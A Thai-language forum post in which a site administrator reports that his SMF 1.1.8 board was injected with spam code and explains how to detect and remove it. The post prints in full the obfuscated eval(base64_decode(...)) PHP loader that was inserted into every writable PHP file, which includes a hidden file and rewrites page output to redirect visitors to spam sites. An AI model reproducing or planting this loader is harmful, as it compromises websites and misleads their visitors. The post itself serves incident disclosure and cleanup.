Author Topic: เว๊บบอร์ด SMF ถูก script injection ด้วยการฝังโค้ดทุกไฟล์ที่เป็น php  (Read 10956 times)

0 Members and 1 Guest are viewing this topic.

Offline Webmaster

  • Nick Computer Services
  • Administrator
  • Full Member
  • *
  • Posts: 168
  • Karma: +999/-0
  • Gender: Male
  • Love Me Love My Services
    • Computer Service

เว๊บบอร์ด ที่ทางเว๊บใช้ SMF 1.1.8 ได้ถูก script injection ด้วยโค้ด spam

โค้ดที่ถูกฝัง ตามโค้ดด้านล่าง

Code: [Select]

<? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9hbnlwdXBjby9wdWJsaWNfaHRtbC9hLWNvcnNvdGFsay9iYi9UaGVtZXMvc2NyaWJibGVzMTEvaW1hZ2VzL2ltZy9pbWcvY29wcGVyLnBocCcpKXtpbmNsdWRlX29uY2UoJy9ob21lL2FueXB1cGNvL3B1YmxpY19odG1sL2EtY29yc290YWxrL2JiL1RoZW1lcy9zY3JpYmJsZXMxMS9pbWFnZXMvaW1nL2ltZy9jb3BwZXIucGhwJyk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmIWZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7aWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pkZWNvZGUoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCl7JFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2Qj1vcmQoc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsMywxKSk7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MT0xMDskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPTA7aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY0KXskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPXVucGFjaygndicsc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsMTAsMikpOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMVsxXTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKz0yKyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImOCl7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MT1zdHJwb3MoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCxjaHIoMCksJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkrMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiYxNil7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MT1zdHJwb3MoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCxjaHIoMCksJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkrMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiYyKXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKz0yO30kUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPWd6aW5mbGF0ZShzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSk7aWYoJFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz09PUZBTFNFKXskUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPSRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4Njg7fXJldHVybiAkUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzO319ZnVuY3Rpb24gZGdvYmgoJFJEQTNFNjE0MTRFNTBBRUU5NjgxMzJGMDNEMjY1RTBDRil7SGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7JFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MD1nemRlY29kZSgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKTtpZihwcmVnX21hdGNoKCcvXDxib2R5L3NpJywkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKSl7cmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPGJvZHlbXlw+XSpcPikvc2knLCckMScuZ21sKCksJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCk7fWVsc2V7cmV0dXJuIGdtbCgpLiRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTA7fX1vYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>


ซึ่งจะติดทุกไฟล์ที่ CMOD ไว้ ที่ 777 จากดูวันที่ไฟล์ถูกฝังโค้ด เมื่อวันที่ 18.5.09  ไฟล์ที่ถูกฝังจะเป็นเฉพาะไฟล์ นามสกุล php เท่านั้น  และยังมีการสร้างไฟล์แปลกปลอมใน folder  "language" อีกด้วย

ผลกระทบจากโค้ดดังกล่าวจะมีการ redirect web ไปยัง web ที่โค้ดกำหนด เมื่อมีการเข้ามาทาง search engine   เริ่ม redirect จากเว๊บ pearch.net แล้วส่งต่อไปที่ click-go.net หรือ ferdax.com หน้าตาเว๊บจะคล้ายกับ google search engine มาก

วิธีสังเกตว่า เว๊บของท่านถูกฝังโค้ดหรือไม่ ให้ เข้าเว๊บบอร์ด แล้ว วิว ดู ซอสโค้ด จะเห็นว่ามี  tag ที่ spam ทำการ generate ขึ้นมา อยู่หลัง <body>

วิธีแก้ไขให้ลบโค้ดดังกล่าวออกจากไฟล์ php ทุกไฟล์ที่ถูกฝังโค้ดนี้ให้หมด ครับ และลบไฟล์ที่แปลกปลอมทุกไฟล์ที่สร้างมาจากโค้ดดังกล่าว ใน folder  "language"

และทำการ อัพเดท เว๊บบอร์ด เป็น เวอร์ชั่นล่าสุด เพื่ออุดช่องโหว่  SMF 1.1.9

วันนี้ (4.6.09) ได้ทำการแก้ไขและลบโค้ดที่ฝังทุกตัวแล้วครับ นั่งลบด้วยมือครับ เหนื่อยเรย หุหุ (หาสาเหตุตั้งนาน)


 
Share this topic...
In a forum
(BBCode)
In a site/blog
(HTML)


Related Topics

  Subject / Started by Replies Last post
0 Replies
7337 Views
Last post June 16, 2010, 01:47:32 PM
by Nick
0 Replies
2336 Views
Last post July 10, 2010, 06:34:30 PM
by Nick
0 Replies
4017 Views
Last post May 22, 2011, 12:00:43 PM
by Nick
0 Replies
2386 Views
Last post May 28, 2011, 03:32:15 PM
by Nick
0 Replies
2259 Views
Last post June 30, 2013, 09:23:07 PM
by Nick